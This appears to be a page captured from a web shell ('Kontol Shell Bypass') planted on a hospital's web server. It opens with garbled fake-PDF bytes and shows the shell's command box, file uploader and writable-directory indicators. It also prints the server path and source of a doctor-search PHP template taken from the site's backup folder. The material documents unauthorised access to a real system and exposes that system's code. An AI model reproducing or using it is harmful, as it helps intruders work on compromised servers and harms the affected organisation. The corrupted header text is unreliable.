%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /var/www/html/shardahospital_old.org/hbackup/application/views/includes/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : /var/www/html/shardahospital_old.org/hbackup/application/views/includes/find_a_doctor.php
<!-- <?php print_r($coes);  ?> -->

<div class="findDr sameMnuBox" style="display: none;">
	<h2>Search by any or all categories</h2>
	<div class="clear"></div>
	<span class="drfind_line"></span>
	<div class="clear"></div>
	<form action="<?php echo site_url('meetourdoctors'); ?>" id="myform" method="get" accept-charset="utf-8">
	<?php //  echo form_open('MeetOurDoctors', 'id="myform"'); ?>
		<p>
			<select name="department" id="speciality">
			<option value="">Choose Department</option>
			<?php if($this->uri->segment(1) == 'centers-of-excellence' && $this->uri->segment(2) != '') {?>
			   <option value="department-of-ivf">Department of IVF</option>
			   <option value="institute-of-child-care">Department of Child Care</option>
			   <option value="institute-of-dental-sciences">Department of Dental Sciences</option>
			   <option value="bone-spine-institute">Department of Bone & Spine Institute</option>
			   <option value="institute-of-neuro-sciences">Department of Neuro Sciences</option>
			   <option value="institute-of-renal-sciences-transplant">Department of Renal Sciences & Transplant</option>
			   <option value="institute-of-cancer">Department of Cancer</option>
			   <option value="institute-of-critical-care-anesthesiology">Department of Critical Care & Anesthesiology</option>
			   <option value="heart-institute">Department of Heart</option>
			   <option value="institute-of-minimal-access-surgery">Department of Minimal Access Surgery</option>
			   <option value="Institute-of-plastic-aesthetic-surgery">Department of Plastic & Aesthetic Surgery</option>

			<?php } else { foreach($coes as $coe){
				echo '<option value="'.$coe['DepartmentPageURL'].'">'.$coe['DepartmentName'].'</option>';
					
			} }?>
			</select>
			
		</p>
	   <!-- <p><input type="text" placeholder="Enter ZIP Code" name="enter_zip_code" id="enter_zip_code" value=""></p>-->
		<p>
		<select name="doctor" id="search-box">
			<option value="" style="display:contents">Choose Doctor</option>
			</select>
	    <!-- <input type="hidden" name="doctors" id="doctors" value=""></input>		 -->
		<div class="clear"></div>
		<div id="suggesstion-box"></div>
		<p><input value="Search" name="Search" id="Search" type="submit"></p>
	</form>
	<?php //echo form_close(); ?>
</div>
<script>
var fields='<option value="">Choose Doctor</option>';
$( document ).ready(function() {
	$.ajax({
		       	type: 'POST',  // http method
		       	url: "<?=base_url('Home/getDoctors1')?>",
				data: {
					dept_id: '',
				},
                // data to submit
                dataType: 'json',
                success: function (data, status, xhr) {
                    if(status=="success"){							
						console.log(data.length);
						for (let i = 0; i < data.length; i++) {
								fields += '<option value="'+data[i].DoctorName+'">'+data[i].DoctorName+'</option>';
							}
							$('#search-box').html('');
							$('#search-box').html(fields);
                    }else{
                        alert("Upload Failed");
                    }
                },
	});	
});

$('#speciality').on('change', function(){
	var fields='<option value="">Choose Doctor</option>';
	dept_id = $(this).val();
	$.ajax({
		       	type: 'POST',  // http method
		       	url: "<?=base_url('Home/getDoctors1')?>",
				data: {
					dept_id: dept_id,
				},
                // data to submit
                dataType: 'json',
                success: function (data, status, xhr) {
                    if(status=="success"){							
						console.log(data.length);
						console.log(data);
						
						for (let i = 0; i < data.length; i++) {
								fields += '<option value="'+data[i].DoctorName+'">'+data[i].DoctorName+'</option>';
							}
							$('#search-box').html('');
							$('#search-box').html(fields);
							var doctors = [];
							for (let i = 0; i < data.length; i++) {
								doctor = data[i].DoctorName;
								doctors.push(data[i].DoctorName);
							 //   designation = data[i].DoctorDesignation;
							//	console.log(doctor,designation);
							}
						//	console.log(doctor,designation);
						    console.log(doctors);
                            $('#doctors').val(doctors);
					// 		$.ajax({
                    //          url :'<?= base_url('meetourdoctors') ?>',  // Controller URL
                    //          type : 'POST',
                    //          data : doctors,
                    //          success : function(response) {   
                    //         //Do what needs to be done
			        //          console.log("sent Successfully");
			        //     //     console.log(response);
                    //    }
                    //  });
                    }else{
                        alert("Upload Failed");
                    }
                },
            	});
});


// function send_data(DataToSend) {
// 	var data1 = DataToSend;
// 	console.log(DataToSend);
//         $.ajax({
//         url :'<?= base_url('MeetOurDoctors/index') ?>',  // Controller URL
//         type : 'POST',
//         data : data1,
//         success : function(response) {   
//             //Do what needs to be done
// 			console.log("sent Successfully");
// 			console.log(response);
//         }
//     });
// }
</script>

Kontol Shell Bypass